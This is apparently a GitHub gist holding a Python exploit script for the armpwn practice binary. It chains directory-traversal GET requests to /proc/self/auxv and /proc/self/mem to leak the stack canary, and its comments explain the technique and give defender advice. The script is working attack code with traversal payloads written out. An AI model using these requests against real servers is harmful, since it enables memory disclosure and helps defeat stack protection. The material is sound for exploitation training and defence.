@hugsy
Last active January 18, 2017 02:04
#!/usr/bin/env python
#
# Leaking the canary value of the armpwn binary, thanks to Directory Traversal
#
# @_hugsy_
#
# armpwn was created/maintained by @5aelo
#
# How the leak works (educational): the armpwn HTTP server accepts "../"
# segments in the request path, so the client can read files from the server
# process's own /proc/self/ tree.  Two reads are chained below: /proc/self/auxv
# gives the address of the AT_RANDOM bytes, then a Range read of /proc/self/mem
# at that address returns the bytes glibc derived the stack canary from.
#
# Defender takeaways: canonicalise the request path and reject anything that
# escapes the document root (or serve from a chroot); treat any file-read
# primitive on the serving process as a full memory disclosure, because
# /proc/self/mem is readable by the process itself; "../" and "/proc/" in
# request lines are the access-log signature to alert on.
#
# Written for Python 2 (str is bytes: request strings are sent as-is and the
# recv() buffers are searched with str methods).
from __future__ import print_function
import socket, struct
# Target service: hostname/port of the armpwn server under test.
HOST, PORT = "rpi2-1", 80
# auxv entry type AT_RANDOM: kernel-supplied pointer to 16 random bytes.
AT_RANDOM = 25
s = socket.socket()
s.connect((HOST, PORT))
print("[+] Connected")
# Step 1: fetch /proc/self/auxv through the traversal.
print("[+] Leaking AUVX")
s.send("GET ../../../../../proc/self/auxv HTTP/1.0\r\n\r\n")
# NOTE(review): a single recv(1024) assumes the whole response arrives in one
# read; a short read makes the struct.unpack below raise rather than misreport.
data = s.recv(1024)
# Skip the HTTP headers: the body starts after the blank line.
i = data.find('\r\n'*2)
data = data[i+4:]
# auxv on 32-bit ARM is a sequence of (type, value) pairs of 4 bytes each,
# hence the 8-byte stride and the little-endian "<I" unpacking.
at_random_address = None
for i in range(0, len(data), 8):
    code = struct.unpack("<I", data[i:i+4])[0]
    if code==AT_RANDOM:
        value = struct.unpack("<I", data[i+4:i+8])[0]
        at_random_address = value
        break
if at_random_address is None:
    print("[-] not found")
    exit(1)
print("[+] AT_RANDOM={:#x}".format(at_random_address))
# Step 2: read the 16 AT_RANDOM bytes out of the process's memory via the same
# traversal; the Range header selects the byte offset (= address) in
# /proc/self/mem.
print("[+] Forging HTTP request using Range")
m = "GET ../../../../../proc/self/mem HTTP/1.0\r\n"
m+= "Range: bytes={:d}-{:d}\r\n\r\n".format(at_random_address,at_random_address+16)
s.send(m)
data = s.recv(1024)
# Skip the HTTP headers again; the body holds the raw memory bytes.
i = data.find('\r\n'*2)
data = data[i+4:]
# The canary is the first 4 bytes at AT_RANDOM; glibc zeroes its lowest byte
# (so a C string copy stops there), which the mask reproduces.
canary = struct.unpack("<I", data[:4])[0]
canary &= 0xffffff00
print("[+] Canary is {:#x}".format(canary))
s.close()